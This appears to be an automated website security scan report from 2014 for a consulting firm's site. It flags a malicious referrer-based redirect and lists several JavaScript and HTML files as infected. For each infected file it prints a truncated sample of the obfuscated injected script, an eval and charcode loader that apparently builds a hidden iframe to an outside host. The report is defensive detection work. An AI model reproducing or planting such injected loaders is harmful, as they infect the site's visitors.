Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://ggateconsulting.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: ggateconsulting.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Sep 2014 21:15:31 GMT Location: http://oitsolutions.ca/images/rel.php Server: Apache Content-Length: 314 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://ggateconsulting.com/ | 200 OK Content-Length: 18888 Content-Type: text/html | clean |
http://ggateconsulting.com/user.js | 200 OK Content-Length: 4933 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,17,17,17,6d,58,69,17,69,62,67,69,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,17,17,17,69,62,67,69,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,69,66,70,58,63,6b,70,6a,6b,5c,58,64,5a,6 Antivirus reports:
| ||
http://ggateconsulting.com/_menus/dmenu.js | 200 OK Content-Length: 47213 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,17,17,17,6d,58,69,17,69,62,67,69,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,17,17,17,69,62,67,69,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,69,66,70,58,63,6b,70,6a,6b,5c,58,64,5a,6 Antivirus reports:
| ||
http://ggateconsulting.com/data0.js | 200 OK Content-Length: 8529 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,17,17,17,6d,58,69,17,69,62,67,69,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,17,17,17,69,62,67,69,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,69,66,70,58,63,6b,70,6a,6b,5c,58,64,5a,6 Antivirus reports:
| ||
http://ggateconsulting.com/data1.js | 200 OK Content-Length: 8691 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,17,17,17,6d,58,69,17,69,62,67,69,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,17,17,17,69,62,67,69,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,69,66,70,58,63,6b,70,6a,6b,5c,58,64,5a,6 Antivirus reports:
| ||
http://ggateconsulting.com/History.html | 200 OK Content-Length: 34889 Content-Type: text/html | clean |
http://ggateconsulting.com/data15.js | 200 OK Content-Length: 8694 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,17,17,17,6d,58,69,17,69,62,67,69,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,17,17,17,69,62,67,69,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,69,66,70,58,63,6b,70,6a,6b,5c,58,64,5a,6 Antivirus reports:
| ||
http://ggateconsulting.com/Disclaimer.html | 200 OK Content-Length: 22203 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,17,17,17,6d,58,69,17,5a,63,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,17,17,17,5a,63,6b,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,69,66,70,58,63,6b,70,6a,6b,5c,58,64,5a,63,5c,5 Antivirus reports:
| ||
http://ggateconsulting.com/data20.js | 200 OK Content-Length: 8697 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,17,17,17,6d,58,69,17,69,62,67,69,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,17,17,17,69,62,67,69,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,69,66,70,58,63,6b,70,6a,6b,5c,58,64,5a,6 Antivirus reports:
| ||
http://ggateconsulting.com/Terms__Conditions.html | 200 OK Content-Length: 16246 Content-Type: text/html | clean |
http://ggateconsulting.com/data19.js | 200 OK Content-Length: 8704 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,17,17,17,6d,58,69,17,69,62,67,69,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,17,17,17,69,62,67,69,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,69,66,70,58,63,6b,70,6a,6b,5c,58,64,5a,6 Antivirus reports:
| ||
http://ggateconsulting.com/Policy.html | 200 OK Content-Length: 20218 Content-Type: text/html | clean |
http://ggateconsulting.com/data18.js | 200 OK Content-Length: 8693 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,17,17,17,6d,58,69,17,69,62,67,69,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,17,17,17,69,62,67,69,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,69,66,70,58,63,6b,70,6a,6b,5c,58,64,5a,6 Antivirus reports:
| ||
http://ggateconsulting.com/index.html | 200 OK Content-Length: 18913 Content-Type: text/html | clean |
http://ggateconsulting.com/Our_Approach.html | 200 OK Content-Length: 15472 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ggateconsulting.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ggateconsulting.com/
Result: ggateconsulting.com is not infected or malware details are not published yet.
Result: ggateconsulting.com is not infected or malware details are not published yet.